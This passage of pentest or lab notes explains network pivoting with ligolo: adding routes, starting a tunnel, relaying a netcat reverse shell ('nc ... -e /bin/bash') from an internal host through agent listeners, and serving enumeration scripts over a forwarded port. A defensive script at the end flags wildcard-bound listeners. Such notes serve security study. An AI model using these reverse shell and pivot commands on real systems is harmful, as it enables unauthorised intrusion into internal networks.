After that, we receive the connection back on our attacker box. You can issue the help command to see the functionality the agent can perform.
Routing table -
On attacker box -
# ligolo terminal
$ session - select the session you want to interact with
$ ifconfig - list all the available networks on the target box
# bash terminal
$ sudo ip route add 10.10.120.0/24 dev ligolo
$ ip route list - confirm that the route was added
After that, you can start a tunnel and interact with the internal network.
In the ligolo terminal -
$ session - list all the connected agents
$ start - select session and start tunnel
After this setup, you can start scanning the internal network.
Obtaining a reverse shell from the internal host
What if we need to catch a reverse shell coming from an internal host? We cannot catch the shell directly, because the internal network cannot reach our attacker box. Instead, we use the ligolo agent box to forward the shell back to us.
Let's assume we are going to execute some type of RCE on the internal box.
# Internal target box -
- Let's say we are crafting a payload; in that payload we need to put the ligolo agent box IP address and port number.
$ nc 10.10.169.23 4444 -e /bin/bash - here the IP address should be the ligolo agent box IP
# ligolo terminal -
Now we add a listener to forward the traffic to our box:
$ listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:1234
$ nc -lvp 1234 - run on the attacker box; the shell arrives on port 1234
File Transfer -
Let's say we need to transfer scripts such as linpeas and winpeas to internal boxes.
# ligolo terminal -
- We can add another listener to forward the traffic back to our attacker box:
$ listener_add --addr 0.0.0.0:7777 --to 127.0.0.1:8000
- Now, from the internal box, we can browse to port 7777 on the ligolo agent box IP, and the traffic is redirected back to the attacker box.
- We then start our Python server on the attacker box on port 8000:
$ python -m http.server
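Both listener_add steps above (ports 4444 and 7777) leave a TCP listener bound to 0.0.0.0 on the agent box, which is what a defender reviewing that host would see. The following is an added example, not part of the original notes or of ligolo: it flags wildcard-bound listeners whose port is not on an allowlist. The function names, the allowlist, and the sample `ss -Htlnp` lines (process names, PIDs) are assumptions constructed for illustration.

```bash
#!/bin/sh
# Added example: review `ss -Htlnp` output from a host suspected of being
# used as a pivot and report listeners bound to all interfaces on ports
# that are not expected there.

# Constructed sample of `ss -Htlnp` output (process names and PIDs are made up).
sample_ss_output() {
  cat <<'EOF'
LISTEN 0 128  0.0.0.0:22     0.0.0.0:* users:(("sshd",pid=812,fd=3))
LISTEN 0 4096 0.0.0.0:4444   0.0.0.0:* users:(("agent",pid=2210,fd=7))
LISTEN 0 4096 *:7777         *:*       users:(("agent",pid=2210,fd=9))
LISTEN 0 128  127.0.0.1:5432 0.0.0.0:* users:(("postgres",pid=640,fd=5))
LISTEN 0 128  [::]:443       [::]:*    users:(("nginx",pid=901,fd=6))
EOF
}

# flag_wildcard_listeners "<allowed ports>" < ss_output
# Prints "<port> <process>" for every listener bound to 0.0.0.0, * or [::]
# whose port is not in the space- or comma-separated allowlist.
# Assumes the -t only layout, where field 4 is Local Address:Port.
flag_wildcard_listeners() {
  awk -v allow="$1" '
    BEGIN { n = split(allow, a, /[ ,]+/); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    $1 == "LISTEN" {
      port = $4; sub(/^.*:/, "", port)       # text after the last colon
      host = $4; sub(/:[^:]*$/, "", host)    # text before the last colon
      if (host != "0.0.0.0" && host != "*" && host != "[::]") next
      if (port in ok) next
      proc = "unknown"                       # ss hides users:() without privileges
      if (match($0, /users:\(\("[^"]+"/))
        proc = substr($0, RSTART + 9, RLENGTH - 10)
      print port, proc
    }'
}

# Stand-alone run against the constructed sample; on a live host use:
#   ss -Htlnp | flag_wildcard_listeners "22 443"
sample_ss_output | flag_wildcard_listeners "22 443"
```

Loopback-only listeners are skipped on purpose, since they are not reachable from the internal network.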